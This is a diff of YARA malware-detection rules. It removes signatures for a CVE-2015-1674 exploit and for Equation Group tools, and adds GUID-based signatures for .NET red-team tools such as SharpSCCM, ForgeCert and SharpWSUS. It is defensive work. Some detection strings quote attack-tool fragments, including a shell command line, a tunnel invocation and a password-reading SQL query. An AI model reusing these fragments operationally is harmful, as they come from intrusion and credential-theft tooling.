-		$s1 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
-		$s2 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
-		$s3 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
-		$s4 = "msi3_32.dll" fullword wide
-		$s5 = "RunDLL" fullword ascii
-		$s6 = "MSI Custom Action v3" fullword wide
-		$s7 = "msi3_32" fullword wide
-		$s8 = "Operating System" fullword wide
+		$typelibguid0lo = "21f398a9-bc35-4bd2-b906-866f21409744" ascii wide
+		$typelibguid0up = "21F398A9-BC35-4BD2-B906-866F21409744" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 72KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_CVE_2015_1674_CNGSYS : CVE_2015_1674 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsccm : FILE
 {
 	meta:
-		description = "Detects exploits for CVE-2015-1674"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1161b395-a19e-5aac-8416-8a4e60aeca37"
-		date = "2015-05-14"
-		modified = "2023-12-05"
-		reference = "http://www.binvul.com/viewthread.php?tid=508"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_1674.yar#L10-L28"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "276269b1-e3b3-5774-a86a-1c3a8bca8209"
+		date = "2023-03-15"
+		modified = "2023-04-06"
+		reference = "https://github.com/Mayyhem/SharpSCCM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5116-L5132"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "af4eb2a275f6bbc2bfeef656642ede9ce04fad36"
-		logic_hash = "d751ef739a6fb8b0871f92cb4aba21544f444944710407c723f0452dc3b85522"
+		logic_hash = "ce0d186ceb4212619d76f56b32e06efa78572af0d8abd881432928c1876b968b"
 		score = 75
 		quality = 85
-		tags = "CVE-2015-1674, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Device\\CNG" wide
-		$s2 = "GetProcAddress" fullword ascii
-		$s3 = "LoadLibrary" ascii
-		$s4 = "KERNEL32.dll" fullword ascii
-		$s5 = "ntdll.dll" fullword ascii
+		$typelibguid0lo = "03652836-898e-4a9f-b781-b7d86e750f60" ascii wide
+		$typelibguid0up = "03652836-898E-4A9F-B781-B7D86E750F60" ascii wide
+		$typelibguid1lo = "e4d9ef39-0fce-4573-978b-abf8df6aec23" ascii wide
+		$typelibguid1up = "E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Noclient_3_0_5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Koh : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file noclient-3.0.5.3"
-		author = "Florian Roth (Nextron Systems)"
-		id = "af7472ce-0605-5f50-8180-23438d2196b8"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L12-L29"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9702526c-b10d-553d-a803-47e352533858"
+		date = "2023-03-18"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/Koh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5134-L5148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51a6bf03c8d034942bf02fae2bea52436f53b4d437006b1dbe9c0c67387fe17a"
+		logic_hash = "b9cf1abdf4320a08f9c134e55a8f8531ef965785461b8f49687214810a143929"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&" fullword ascii
-		$x2 = "Command too long!  What the HELL are you trying to do to me?!?!  Try one smaller than %d bozo." fullword ascii
-		$x3 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
-		$x4 = "Error from ourtn, did not find keys=target in tn.spayed" fullword ascii
-		$x5 = "ourtn -d -D %s -W 127.0.0.1:%d  -i %s -p %d %s %s" fullword ascii
+		$typelibguid0lo = "4d5350c8-7f8c-47cf-8cde-c752018af17e" ascii wide
+		$typelibguid0up = "4D5350C8-7F8C-47CF-8CDE-C752018AF17E" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 700KB and 1 of them ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Installdate : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Forgecert : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file installdate.pl"
-		author = "Florian Roth (Nextron Systems)"
-		id = "029b1213-1206-5b7c-bd72-93239a23fe8a"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L31-L50"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "06b3ffbb-5a76-50a0-86dc-b9658bf2d7ec"
+		date = "2023-03-18"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/ForgeCert"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5150-L5164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "363a9c92c4d2560ba6dd0ec41acf136dff4346f20d54f971d319ed2aa531fe31"
+		logic_hash = "6fecf2a1ce947de3978b4e10b1b02f35913a37551884f16eabd1d1d544d963b6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "#Provide hex or EP log as command-line argument or as input" fullword ascii
-		$x2 = "print \"Gimme hex: \";" fullword ascii
-		$x3 = "if ($line =~ /Reg_Dword:  (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {" fullword ascii
-		$s1 = "if ($_ =~ /InstallDate/) {" fullword ascii
-		$s2 = "if (not($cmdInput)) {" fullword ascii
-		$s3 = "print \"$hex in decimal=$dec\\n\\n\";" fullword ascii
+		$typelibguid0lo = "bd346689-8ee6-40b3-858b-4ed94f08d40a" ascii wide
+		$typelibguid0up = "BD346689-8EE6-40B3-858B-4ED94F08D40A" ascii wide
 
 	condition:
-		filesize < 2KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Teflondoor : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Crassus : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file teflondoor.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "188f9ef1-5524-50be-ac62-91cb9726b155"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L52-L73"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d4f94aa3-0431-5ac1-8718-0f0526c3714f"
+		date = "2023-03-18"
+		modified = "2023-04-06"
+		reference = "https://github.com/vu-ls/Crassus"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5166-L5180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "38be3cfa638509d539bf4ada3b5c7e44e01ee4cfb74a53a76cd2f4287c5a56f5"
+		logic_hash = "27c2c67aed20f3d1ec2ef0393342e21a41590cc05c0361309054e0dc699d7cc9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "%s: abort.  Code is %d.  Message is '%s'" fullword ascii
-		$x2 = "%s: %li b (%li%%)" fullword ascii
-		$s1 = "no winsock" fullword ascii
-		$s2 = "%s: %s file '%s'" fullword ascii
-		$s3 = "peer: connect" fullword ascii
-		$s4 = "read: write" fullword ascii
-		$s5 = "%s: done!" fullword ascii
-		$s6 = "%s: %li b" fullword ascii
+		$typelibguid0lo = "7e9729aa-4cf2-4d0a-8183-7fb7ce7a5b1a" ascii wide
+		$typelibguid0up = "7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Durablenapkin_Solaris_2_0_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Restrictedadmin : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7b49a26d-9ee3-5aff-93fc-509239daef28"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L75-L92"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1b3572a5-bb21-58bb-91f9-963a0a17d699"
+		date = "2023-03-18"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/RestrictedAdmin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5182-L5196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "113f9451d6792511baa168957c643de02f37826b32944ef882f49b68496ec596"
+		logic_hash = "fc8fe9df771fb794a2ea44d68741003451747a7eb10156a9ed486f87a2d42c6d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "recv_ack: %s: Service not supplied by provider" fullword ascii
-		$s2 = "send_request: putmsg \"%s\": %s" fullword ascii
-		$s3 = "port undefined" fullword ascii
-		$s4 = "recv_ack: %s getmsg: %s" fullword ascii
-		$s5 = ">> %d -- %d" fullword ascii
+		$typelibguid0lo = "79f11fc0-abff-4e1f-b07c-5d65653d8952" ascii wide
+		$typelibguid0up = "79F11FC0-ABFF-4E1F-B07C-5D65653D8952" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Teflonhandle : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_P2P : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file teflonhandle.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4d82cc41-3777-5f8c-9392-aca69e6ed781"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L94-L111"
+		description = "Detects .NET red/black-team tools via typelibguid (p2p Remote Desktop is dual use but 100% flagged as malicious on VT)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e7b2b4bd-f1e1-5062-9b36-5df44ae374ea"
+		date = "2023-03-19"
+		modified = "2023-04-06"
+		reference = "https://github.com/miroslavpejic85/p2p"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5198-L5212"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7dfa713b763c983219f008405e1ebf3dfe386672f2d4e5fb54b2b362023ae08a"
+		logic_hash = "fcdeb2f481232ba0d13642b3003a94435c4de4e90c342c0db7707a6751a66834"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s [infile] [outfile] /k 0x[%i character hex key] </g>" fullword ascii
-		$s2 = "File %s already exists.  Overwrite? (y/n) " fullword ascii
-		$s3 = "Random Key : 0x" fullword ascii
-		$s4 = "done (%i bytes written)." fullword ascii
-		$s5 = "%s --> %s..." fullword ascii
+		$typelibguid0lo = "33456e72-f8e8-4384-88c4-700867df12e2" ascii wide
+		$typelibguid0up = "33456E72-F8E8-4384-88C4-700867DF12E2" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_False : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwsus : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file false.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3a68790b-38fc-570b-8b19-c5478cdd2842"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L113-L134"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f020eea9-4ff4-5242-b9b2-53284505dab4"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/nettitude/SharpWSUS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5214-L5228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1938bc7a5a7a1bb382c2bab976013a1adedc045e0312daabe1bdcdd65d0c606"
+		logic_hash = "1511bb29b808146852555c7bc23cbdc9a4a2d70547fb1541790d1947a42d6089"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
-			00 25 6C 75 2E 25 6C 75 2E 25 6C 75 2E 25 6C 75
-			00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
-			00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
-			00 25 32 2E 32 58 20 00 00 0A 00 00 00 25 64 20
-			2D 20 25 64 20 25 64 0A 00 25 64 0A 00 25 64 2E
-			0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E
-			0A 00 00 00 00 25 64 20 2D 20 25 64 0A 00 00 00
-			00 25 64 20 2D 20 25 64 }
+		$typelibguid0lo = "42cabb74-1199-40f1-9354-6294bba8d3a4" ascii wide
+		$typelibguid0up = "42CABB74-1199-40F1-9354-6294BBA8D3A4" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and $s1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Dn_1_0_2_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpimpersonation : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file dn.1.0.2.1.linux"
-		author = "Florian Roth (Nextron Systems)"
-		id = "24b5fb51-2463-56ef-818a-949b4b3bbf5b"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L136-L152"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5815c5bd-e3e8-5f2f-b03e-8a05fb4f6e91"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/S3cur3Th1sSh1t/SharpImpersonation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5230-L5244"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b6420401419b280f01f7fc73412386a19e94a57e589a043b231b6a721585c99"
+		logic_hash = "c875b3e499b0fc6aa2833c3be88a4a4b93062e88cc8f1201eaf12e0b10f7cc95"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO" fullword ascii
-		$s2 = "invalid format suggest DMAC=00:00:00:00:00:00" fullword ascii
-		$s3 = "SMAC=%02x:%02x:%02x:%02x:%02x:%02x" fullword ascii
-		$s4 = "Not everything is set yet" fullword ascii
+		$typelibguid0lo = "27a85262-8c87-4147-a908-46728ab7fc73" ascii wide
+		$typelibguid0up = "27A85262-8C87-4147-A908-46728AB7FC73" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Morel : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcloud : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file morel.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e741b727-0e41-53d0-832c-df7f4ea7964a"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L154-L170"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "048b0239-ea13-58ff-af35-fd505b4c977a"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/chrismaddalena/SharpCloud"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5246-L5260"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "463d628bb19e27e94dcccc4c7d435d86111d51aa9f77c5ca1a199d9aaa9017ba"
+		logic_hash = "d1ad4088ce5b4216930d74ab7c2bc7b4d700928740faff27ebbb69e79068b14e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9152e67f507c9a179bb8478b58e5c71c444a5a39ae3082e04820a0613cd6d9f"
 
 	strings:
-		$s1 = "%d - %d, %d" fullword ascii
-		$s2 = "%d - %lu.%lu %d.%lu" fullword ascii
-		$s3 = "%d - %d %d" fullword ascii
+		$typelibguid0lo = "ca4e257e-69c1-45c5-9375-ba7874371892" ascii wide
+		$typelibguid0up = "CA4E257E-69C1-45C5-9375-BA7874371892" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Bc_Parser : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpssdp : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file bc-parser"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ed4523de-b126-503a-83bd-aafd8533b0e5"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L172-L187"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8441e940-ab7c-5467-9db8-35f71bd57580"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/rvrsh3ll/SharpSSDP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5262-L5276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e8911acc1173e1149fd11dd795b72ba26bc654cbc7f9d95053ce420663fcafe9"
+		logic_hash = "0bb30d6b35db2b8144d284f25051f231ce6684f6a1213dc24ba2da0d5e4d4603"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "879f2f1ae5d18a3a5310aeeafec22484607649644e5ecb7d8a72f0877ac19cee"
 
 	strings:
-		$s1 = "*** Target may be susceptible to FALSEMOREL      ***" fullword ascii
-		$s2 = "*** Target is susceptible to FALSEMOREL          ***" fullword ascii
+		$typelibguid0lo = "6e383de4-de89-4247-a41a-79db1dc03aaa" ascii wide
+		$typelibguid0up = "6E383DE4-DE89-4247-A41A-79DB1DC03AAA" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x457f and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_1212 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Wiretap : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file 1212.pl"
-		author = "Florian Roth (Nextron Systems)"
-		id = "428fed4f-df5c-5fc2-ac4b-4dea69ea4f2d"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L189-L207"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5513a295-8907-5a9c-adca-760b33004229"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/djhohnstein/WireTap"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5278-L5292"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1be7ed8fdfaecc6e55c4d1e75cf841f4620df3d2abe6aed2761aed20c42f70bd"
+		logic_hash = "1e2199f7d4a01985edd2b4a071b928a3329e4f0f39d786608fdbbae1a01783fe"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))" fullword ascii
-		$s2 = "$ans=\"$srcip:$srcport -> $dstip:$dstport\";" fullword ascii
-		$s3 = "return \"ERROR:$line is not a valid port\";" fullword ascii
-		$s4 = "$dstport=hextoPort($dstport);" fullword ascii
-		$s5 = "sub hextoPort" fullword ascii
-		$s6 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
+		$typelibguid0lo = "b5067468-f656-450a-b29c-1c84cfe8dde5" ascii wide
+		$typelibguid0up = "B5067468-F656-450A-B29C-1C84CFE8DDE5" ascii wide
 
 	condition:
-		filesize < 6KB and 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_1212_Dehex : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Kittylitter : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2cc375e6-2bff-5623-b86c-a6413f736c42"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L209-L226"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f457b91f-4adb-5be6-b9c2-f6cc39d4bdaf"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/djhohnstein/KittyLitter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5294-L5312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "74d1b0e820696cd5507996996bead50d283e83095bc7288a6e8e484738b6348b"
+		logic_hash = "0d68b2e8501db9e534b37260f7972caae8ec9756bf55c02ec60fadd256193080"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "return \"ERROR:$line is not a valid address\";" fullword ascii
-		$s2 = "print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";" fullword ascii
-		$s3 = "push(@octets,$byte_table{$tempi});" fullword ascii
-		$s4 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
-		$s5 = "print hextoIP($ARGV[0]);" fullword ascii
+		$typelibguid0lo = "449cf269-4798-4268-9a0d-9a17a08869ba" ascii wide
+		$typelibguid0up = "449CF269-4798-4268-9A0D-9A17A08869BA" ascii wide
+		$typelibguid1lo = "e7a509a4-2d44-4e10-95bf-b86cb7767c2c" ascii wide
+		$typelibguid1up = "E7A509A4-2D44-4E10-95BF-B86CB7767C2C" ascii wide
+		$typelibguid2lo = "b2b8dd4f-eba6-42a1-a53d-9a00fe785d66" ascii wide
+		$typelibguid2up = "B2B8DD4F-EBA6-42A1-A53D-9A00FE785D66" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 6KB and ( 5 of ( $s* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Install_Get_Persistent_Filenames : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpview : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file install_get_persistent_filenames"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cf74b479-4b78-537a-878c-2f3ce004b775"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L237-L250"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2ae1bc26-c137-55ce-ae2e-3204ff07f671"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/tevora-threat/SharpView"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5314-L5328"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "be07e3e3e96dd4676a76b32eb8fc47b2ab1f66ebbd6c2a3f1c88fc224f9f39ef"
+		logic_hash = "74c1b0ad4717b3d9494b0f1df4a51d03d0e0cbf99e5d911beaa2cc67cdd50233"
 		score = 75
 		quality = 85
 		tags = "FILE"
